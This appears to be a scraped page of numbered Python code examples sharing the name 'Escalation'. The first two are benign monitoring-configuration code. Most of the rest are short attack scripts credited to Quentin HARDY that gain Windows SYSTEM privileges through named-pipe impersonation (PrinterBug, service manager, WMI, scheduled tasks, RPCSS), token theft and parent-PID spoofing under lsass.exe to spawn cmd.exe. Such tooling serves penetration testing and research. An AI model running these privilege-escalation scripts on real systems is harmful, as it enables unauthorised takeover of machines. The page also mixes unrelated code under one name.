Exemplo n.º 1
0
    def explode(self, escalations):
        # Now we explode all escalations (host_name, service_description) to escalations
        for es in self:
            properties = es.__class__.properties

            creation_dict = {'escalation_name': 'Generated-Serviceescalation-%s' % es.id}
            for prop in properties:
                if hasattr(es, prop):
                    creation_dict[prop] = getattr(es, prop)
            # print "Creation an escalation with:", creation_dict
            s = Escalation(creation_dict)
            escalations.add_escalation(s)
Exemplo n.º 2
0
 def explode(self, escalations):
     # Now we explode all escalations (host_name, service_description) to escalations
     for es in self:
         properties = es.__class__.properties
         name = getattr(es, 'host_name', getattr(es, 'hostgroup_name', ''))
         creation_dict = {
             'escalation_name':
             'Generated-Hostescalation-%d-%s' % (es.id, name)
         }
         for prop in properties:
             if hasattr(es, prop):
                 creation_dict[prop] = getattr(es, prop)
         s = Escalation(creation_dict)
         escalations.add_escalation(s)
# -*- coding: UTF-8 -*-
# By Quentin HARDY ([email protected]) - bobsecq

import sys
sys.path.append('../')
from utils import *
configureLogging()
from escalation import Escalation
from impersonate import Impersonate

esc = Escalation()
esc.namedPipeImpersonationSystemViaPrinterBug()
imp = Impersonate()
imp.enableAllUserRights()  #Not necessary but we can do it, we do it
imp.executeCMDWithThreadEffectiveToken()
# -*- coding: UTF-8 -*-
# By Quentin HARDY ([email protected]) - bobsecq

import sys
sys.path.append('../')
from utils import *
configureLogging()
from escalation import Escalation

esc = Escalation()
ppidLSASS = getPIDfromName('lsass.exe')
esc.namedPipeImpersonationViaSpoofPPIDWithPID(pid=ppidLSASS, ps=False)
Exemplo n.º 5
0
# -*- coding: UTF-8 -*-
# By Quentin HARDY ([email protected]) - bobsecq

import sys
sys.path.append('../')
from utils import *
configureLogging()
from escalation import Escalation

esc = Escalation()
esc.printCandidatesServices()
esc.namedPipeImpersonationSystemViaSCM(ps=True, debug=False)
esc.namedPipeImpersonationViaAService("serviceWithDomainUserAdmin")
#esc.namedPipeImpersonationViaAService("BcastDVRUserService_89401")
# -*- coding: UTF-8 -*-
# By Quentin HARDY ([email protected]) - bobsecq

import sys
sys.path.append('../')
from utils import *
configureLogging()
from escalation import Escalation

esc = Escalation()
esc.namedPipeImpersonationSystemViaWmiJobCmd(ps=True)
# -*- coding: UTF-8 -*-
# By Quentin HARDY ([email protected]) - bobsecq

import sys
sys.path.append('../')
from utils import *
configureLogging()
from escalation import Escalation

esc = Escalation()
esc.namedPipeImpersonationSystemViaTaskScdh(debug=False)
# -*- coding: UTF-8 -*-
# By Quentin HARDY ([email protected]) - bobsecq

import sys
sys.path.append('../')
from utils import *
configureLogging()
from escalation import Escalation

esc = Escalation()
esc.namedPipeImpersonationSystemViaSCM(ps=True, debug=False)
Exemplo n.º 9
0
# -*- coding: UTF-8 -*-
# By Quentin HARDY ([email protected]) - bobsecq

import sys

sys.path.append('../')
from utils import *

configureLogging()
from escalation import Escalation
from impersonate import Impersonate
import subprocess
import time

esc = Escalation()
esc.namedPipeImpersonationSystemViaRPCSS()
imp = Impersonate()
imp.enableAllUserRights()  #required, othwerwise not enough privileges
imp.executeWithThreadEffectiveToken(appName=sys.argv[1])
Exemplo n.º 10
0
# -*- coding: UTF-8 -*-
# By Quentin HARDY ([email protected]) - bobsecq

import sys

sys.path.append('../')
from utils import *

configureLogging()
from escalation import Escalation

esc = Escalation()
esc.printCandidatesSpoofPPID()
ppidLSASS = getPIDfromName('lsass.exe')
esc.spoofPPID(ppid=ppidLSASS,
              appName="c:\\windows\\system32\\cmd.exe",
              cmdLine=None,
              lpProcessAttributes=None,
              lpThreadAttributes=None,
              bInheritHandles=0,
              creationFlags=(CREATE_NEW_CONSOLE
                             | EXTENDED_STARTUPINFO_PRESENT),
              lpEnvironment=None,
              lpCurrentDirectory=None)